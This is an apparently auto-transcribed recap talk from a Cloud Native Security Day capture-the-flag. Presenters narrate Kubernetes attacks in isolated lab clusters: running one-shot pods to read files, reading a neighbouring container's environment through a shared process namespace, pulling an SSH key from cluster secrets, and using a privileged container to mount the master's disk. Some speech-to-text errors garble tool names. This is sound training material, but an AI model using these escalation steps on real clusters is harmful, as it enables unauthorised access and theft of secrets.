 Hey, Andy, I think it's time for us to start doing this wrap up talk. Fabulous and wonderful. Well, welcome to the Cloud Native Security Day CTF outro. Oh, he says outro, and this is the recap. Let's go to there instead. There we are. Welcome to the recap. We will do a post-cap recap decap, walk through what we did today, and go under the hood to explain some of the attacks. Peace indeed is never an option for a naughty goose, and today we were off hunting clusters in the wild. But actually, it was not the public internet we were using. It was far more constrained environment, whereby we stood everything up in order to practice and learn in a safe place. So every cluster had a bastion host, and every cluster was inaccessible from the public internet. So what were we trying to do? We were trying to avoid this kind of thing. But a little bit of frustration is a helpful learning tool. But by having a task master available, and hopefully responsive enough, we looked to assuage some of those concerns. So let's have a look at the spoilers. We do not have very long to get through all of these. So we're going to try and do them as quickly as possible and do a bone-by-pone demo of, well, as you say, everything that we were doing. So we will start off, he says. Sorry, I'm going to sit second here. Yeah, so I think we're going to start off with scenario three, which is Avalon. So earlier on today, we had two separate Twitch streams. In the first Twitch stream, we went through scenario one. That'll be available for you to review. And then also in the afternoon Twitch stream, we went through scenario five. So without further ado, I'll pass back to Mr. Andrew Martin to show us a way through the scenario three, which was called Avalon. Thank you very much. So the purpose of this is we trust within our private networks our own container registries hold code that we believe is safe to use. So we've deployed an image from our private registry. But the pirates, Captain Hashjack and the nefarious crew have taken the registry down so we can no longer get images from it. But there's a secret in one of those deployed images. So let's have a look for the secret key to unlock the plug in the bottom of the captain's prize ship and hopefully scuttle it. So we're in the Hashjack pod in the Avalon namespace. Well, what does that mean? As usual, let's just see what the mount points look like. Let's check DF and see, OK. The initial dual in any Kubernetes escalation is the service count. So let's see what we've got available. So we have Qt control installed. So we're probably in a container that was used internally by administrators to do something useful. And we will try and use something that's less than useful. So let's see what access we've got. Well, we can hit the API server. We can see in the end that we've got routing to these things. It is the Bitnami Qt control app. Thank you very much, Bitnami. That probably means it's relatively well configured from a file system perspective. What does that mean? It means that we're UID 1001, but group ID 0. Does that show us anything? Well, actually, there is no UID 1001. So that means that our file system access is going to be difficult. It's also why we see I have no name, because our username is pulled from Etsy password and we have no reconciliation because we have no entry, no line in there. OK, so we do have Qt control. And this is probably a bad day for cluster administrators. What pods do we have? OK. So we can see already that we've got three privateer pods. And if we try and do this across all namespaces, use me, that's not quite how you spell spaces, then we can see here. So we have a forbidden. And the API servers leaked our service count name and the namespace back to us. So we can't list pods across all namespaces, fine. But we do have access to our own local namespace. So what do we know about the scenario? Well, just going back to the beginning, we can see there's a secret in one of the deployed images. So we've got access to these pods. How do we find out what images they're running? We examine them as YAML. And we grep for the image tag, or the image key. There we go. So that looks pretty hopeful. This container image is probably the one that we want. So let's just see if we can exec straight in. Control, exec, interactive session, attach a pseudo terminal. Let's go into private here. Oh, we don't have a completion ritual fix. And let's run SH. OK, so we do not have pods exec. That's not very helpful when we want to read the contents of the image that the pod is running from. But we can do something slightly different, which is run the thing instead. And then see if that works. OK, so we've managed to do something. And in fact, I've called pod SH, which is never a good look. Let's call it test random. OK, so we're able to run. But we're not able to attach to the pod. That's not very useful. Let's just have a look again and see what pods we have. So here's the erroneously named. And here's the recently named. So what can we do here? Well, we're looking for something in the file system of a pod or of an image, rather. We can't get that image because it's from a private registry. So the only thing we can do here is to execute something inside the pod that will reveal unto us the actual flag on the file system. So let us say pod is going to be called test. And we'll give it a random name so that we can use the bash built-in random variable so that we get, excuse me, so that we get a different name of the time. Then that's our pod name. And then the command we want to run is probably bash. And then let's just get our ID. And then once we've done that, give it a few seconds for the pod to start. I do a kube control logs on the pod. Just see what happens. So three seconds, pod starting, hopefully. Pod apparently not starting. I wonder if I need those in there. OK, maybe we'll try a slightly different approach to this. Why would that not work? So, Andy, the way that I did this earlier was just to, instead of doing the sleep command during it, is just to write out those logs as you've done, but then kube call logs on the pod and then write it to a dump. So temp dump. And then to cut it out from there. That's how I... That's a good idea. So let's just... So we've named the pod something. The other thing we can do here while we're at it is just to turn debug mode on and bash to make sure that the command is as I think it is. OK, well, mystically, that worked. So let's just do shell command ID. Make sure that we have something. OK, we may have to come back to this one because I would expect this to reveal something to us, at least. Looks like we're just hanging with the invocation. Live demos, eh? Joy, joy of live demos, yeah. We spin up over... Well, I've just forgotten the number, but... ...the terminal too. OK, so it was because I tried to attach a terminal to it. So let's get back to where we were. Command ID. And then we'll pull the logs. So... OK, but we do need to leave a few seconds for the pod to actually start. This is a kind of blind injection attack against the pod. There we go. So now we can execute commands within this one-shot container in the interests of the time that I've wasted that you will never get back. Let's grep for the flag with my favorite one liner. Looks a bit like this. So we're going to find something. Now, we happen to know that it's in the temp directory to save us a little bit of time. And that, hopefully, should now dump out a flag if I'm being sensible. And as people have pointed out before, we don't have to use find here. We do have to... Oh, no, that's not correct. Sorry, we do want to search this. We could just grep from the root of the file system. OK, finally, user share. Never going to make you... This smells of Lewis Denham-Paris cluster perturbering. But there is our flag, finally, hidden in some of the various local file system. And we've pulled that from inside the container. Now, that puts us slightly behind time. So let's see how quickly we can get through the next one. So whilst you get that next one set up, yes. That is my calling card to rig role whenever I get into a cluster or v-scenarios. Again, we're tight on time today, so we're going to see if we can get to the second. But Andy, whenever you're ready to go, give me a shout. And for... I think we're going to go on to scenario four now. What is the name of that scenario when it's home for the second? It is Escalates. OK, there we go. OK, so what are we doing here? The supply chain is compromised. Who would have thought such a thing? Hashtag the Mocky crew have managed to get code merged into the application library that developers use. The library runs in a pod and attackers have then escalated trying to find secrets on the host. So what do we know here? Well, we know that we have two unknown containers from your starting point in the process audit pod. So again, we'll just do the standard, just see what exists here. We have a service account that have cube control. We could install it, but let's look at some other things first. Process table is interesting. So we can see here that we've got sleep infinity twice. The reason for this is that there are two containers in this pod. And for some reason, the containers could see each other's init process. That is generally a bad day because once we share process namespaces, we share PROC. And PROC gives us access to all the good stuff. So we can now see, for example, how that process was invoked. And actually we need to do some null bytes fixing so it's visible. So we've got sleep infinity in there. So we know that it's process 11, here's 11. Got the right one. OK, so what else could we look for in here? Well, we have access to the entire root file system of that process, which of course is a joy for all to behold. Let's just go back and do an ls. OK, so there's some stuff in there, but that's not actually what we're looking for. Got some stuff in temp. But what are we looking for here? Well, actually in this case, we are looking for perhaps something in the environment. So again, we're looking in the environment of the other container in the pod. There are two containers in this pod. And this one is giving us some useful information, perhaps. Again, things are null byte delimited. And their joy of all joys is something that looks suspiciously like a flag. Happy days. There we go. On to the next, in the last five minutes, I'm sure we can get it. So whilst you get set up for that, some honorable mentions to today. So we had Christophe, well, Christophe Epti, Noel Mahé. We had you, Val, all just smashing through the scenarios. Thank you to Wallet as well, who is, I feel, is the community support officer. So thank you ever so much for the channel. Lena, thank you for being the most eager person to request a cluster 20 hours before the event starts, but solely awesome and safe as well. But at this point, Andy, you've got four minutes to do a hack. Excellent. OK, so the cluster is almost about to die as well, because it's an old one. So what are we going to do? Well, the environment doesn't give us much. Cube control has no local routing. OK, so in this case, again, I'd like to check the map points. This is not something that we would expect to see. So let's unmount whatever is bind-mounted over root.cube. Have a look. There's still nothing there. Why might that be? Because there are two bind-mounts. OK, and then let's just double check that the mounts are actually gone. Yeah, there's nothing there anymore. Bind-mounts are just a way of hiding things on a file system. You can hide processes as well. But in this case, we were hiding root.cube. And now we've got cube control access. And there we go. We can route to the API server. So what is the point of this exercise? I hear you ask. What's the point of this exercise, Andy? It is to find where hashjack has hidden his ill-gotten treasure in a hard-to-find place. OK, so first of all, we probably want to get on to the master. But we don't know how we can do that easily. Let's see if we can get any secrets. Irredeemable villainy and the tritically pseudo-reminiscent are both potential candidates. But of course, if we have access to all namespaces, let's just take that one down. We can see there's a fair bit more in here. So noticeably, some of these controller tokens are masquerading. So that suggests that it's a service count token, but it's not. That is created by a human. In the same way, these default tokens, that's not how it should be. So subcompensatory super-average-ness, let's see if we can figure out which of these actually holds the token. So what are we going to do? Let's get a secret. And I will be honest, Louis, I'm not actually sure which is which. So what I did, Andy, when you dropped this one on me was to go all namespaces, get secrets, hyphen, oh, YAML. Nice. And then just grab from that because it'll give you everything. So grab SSH, I think. Yeah. And there we go. It is something that looks a lot like a private key. Here's one that we made earlier. There we go. So we've now got a private key. Let's stick that into SSH ID, I suppose. And so maybe if we did an Nmap, Andy, we would have found a certain port open. But again, to save you from doing it, if you curled the master IP and port 5678. So if you've got the master IP node, if you've got the master IP from doing kubectl, get nodes, type node wide. And there you go. You've already done that. So I'm fair. So OK, this is an important information. Thank you very much. So it's a message from our archetypal arch adversary. Follow the 22 white rabbits. So had we done this beforehand, we may have then thought about trying to find SSH keys, which at this point we have done, anachronously. So we now have access to this. We also know from running kubectl version what the master IP is. Of course, we can get that from our local kubectl config as well, which is probably that much easier. There we go. So let's follow the captain onto the master node. And you've got about a minute as well. So grab all this up. So I'm going forward to say yes. So that's permission denied. But that is because we're not using the right key. There's SSH ID. And we do a classic trick of not setting our permissions. OK, off we go. We're on to the master. So at this point, what am I actually doing here? We need to inspect. We need to find that there is an image on there. Control plane IO valiant effort. And we want to inspect that image. And we want to find where the diff is. So nice. And then but we want to gain access to that diff. But to be able to do so, we don't have pseudo access on this. So if we remember back to the first scenario of today, we showed you how to get privileged access if you run a privileged container. So if we could just loop back to trying to do a Docker run to run a privileged container on our Kubernetes master, which would then allow us to mount the devxvda1 mount, the same thing that we did in scenario 1 today, which then allows us to traverse to the file system that the Docker image is within and speed running. It really is. So first as this for live Docker location is on the hosts. It's on the host file system, which we're on, but it's owned by root. So that means that we have to escalate. We can do that through a container or we can just mount file system as we're about to do here. So if we go into hosts, there we go. So now we should have access to this. He says access to this. Oh, yeah, thanks. OK, yes, it's the directory. And then proc self command line is the only file hidden in the container image. And therein lies the flag. That was a speed run in the half. There were a couple more that you can see that were on the live streams earlier. And I hope that's been at least vaguely informative, if not a little bit too fast to follow. Thank you very much. Have you got any slides? That's a good question. Just to save the thank yous. That is an excellent point. And there are the thank yous. Yes, indeed. Thank you to everybody who's helped putting everything together and also the organizers, the work done to get today smooth and speed bump free and control plane folks who've been laboring on the back end, past and present. Thanks to you all. There is the great passing of the seas. Some attendees enjoyed themselves. And yes, of course, don't put Kubernetes API servers on the public internet. Control plane does this for a living. If you'd like us to run a CTF for you or indeed you'd like to attend some of the SANS training courses, then please do reach out to the relevant channels. And thank you very much for playing. Have a wonderful day.